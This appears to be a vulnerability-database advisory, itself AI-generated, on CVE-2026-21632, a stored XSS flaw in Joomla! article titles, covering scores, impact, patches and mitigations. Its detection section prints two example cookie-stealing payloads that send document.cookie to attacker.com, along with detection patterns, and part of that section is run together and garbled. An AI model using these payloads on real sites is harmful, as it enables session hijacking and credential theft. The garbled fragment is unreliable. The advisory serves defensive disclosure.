
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-21632 is a stored Cross-Site Scripting (XSS) vulnerability in Joomla! CMS caused by a lack of output escaping for article titles, which introduces XSS vectors in various locations across the application. It affects Joomla! CMS versions 3.0.0 through 5.4.3 and 6.0.0 through 6.0.3. The vulnerability was published on April 1, 2026, with patches made available shortly thereafter. It carries a CVSS v3.1 base score of 5.4 (Medium) and a CVSS v4.0 base score of 5.9 (Medium) (GitHub Advisory, Joomla Security).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting): Joomla! fails to properly escape article title output before rendering it in web pages, allowing injected HTML/JavaScript to be interpreted by browsers. Exploitation requires an attacker to hold high-level privileges (e.g., editor or administrator role) to create or modify article titles containing malicious script payloads. The injected script executes in the context of any user who passively views the affected page, making this a stored (persistent) XSS variant. No public proof-of-concept code has been identified at this time (GitHub Advisory, Joomla Security).
Successful exploitation allows an attacker with high-level CMS privileges to inject persistent malicious scripts that execute in the browsers of other users who view affected pages. This can result in session hijacking, credential theft, data exfiltration, and unauthorized manipulation of page content. The CVSS v4.0 assessment rates confidentiality and integrity impact as High, with low availability impact on the vulnerable system and no impact on subsequent systems (GitHub Advisory, Joomla Security).
There is no evidence of active in-the-wild exploitation or a publicly available proof-of-concept exploit at this time. The EPSS score is approximately 0.043% (0th percentile), indicating a low near-term exploitation probability. The exploit maturity is rated as "Unreported" in CVSS v4.0 supplemental metrics, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for high-level privileges within the Joomla! CMS (GitHub Advisory, Joomla Security).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler variant such as "><img src=x onerror=fetch('https://attacker.com/?c='+btoa(document.cookie))>.%3Cscript%3E, onerror=, javascript:) in article title parameters.#__content table containing HTML tags, <script> elements, or JavaScript event handlers (e.g., onerror, onload, onclick).Joomla! has released patched versions addressing this vulnerability: update to Joomla! 5.4.4 (for the 3.x–5.x branch) or Joomla! 6.0.4 (for the 6.x branch). As interim mitigations, restrict article creation and editing privileges to the minimum necessary set of trusted users, implement a strict Content Security Policy (CSP) header to limit script execution, and deploy a Web Application Firewall (WAF) to filter XSS payloads. Regularly audit article titles and content in the database for suspicious script injections (Joomla Security, GitHub Advisory).
The vulnerability was assigned and disclosed by the Joomla! Project security team and published to the GitHub Advisory Database on April 1, 2026. It was picked up by automated vulnerability tracking feeds including CVEFeed, VulDB, and Bluesky CVE notification bots shortly after publication. No notable independent researcher commentary or significant media coverage has been identified beyond standard vulnerability aggregator entries.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."